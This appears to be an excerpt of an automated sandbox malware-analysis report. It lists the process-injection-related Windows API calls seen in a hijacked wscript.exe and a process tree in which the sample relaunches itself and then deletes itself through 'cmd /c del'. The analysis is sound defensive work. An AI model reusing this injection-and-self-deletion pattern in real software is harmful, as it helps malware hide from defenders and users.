Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269820 NtEnumerateKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526B040 NtSuspendThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052698A0 NtWriteVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052698F0 NtReadVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269730 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269B00 NtSetValueKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A710 NtOpenProcessToken, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269760 NtOpenProcess, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269770 NtSetInformationFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A770 NtOpenThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052697A0 NtUnmapViewOfSection, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A3B0 NtGetContextThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A20 NtResumeThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A00 NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269610 NtEnumerateValueKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A10 NtQuerySection, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269670 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A80 NtOpenDirectoryObject, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD85E0 NtCreateFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD8690 NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD87C0 NtAllocateVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD8710 NtClose, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD85DA NtCreateFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD868C NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD868A NtReadFile, |
Source: unknown | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |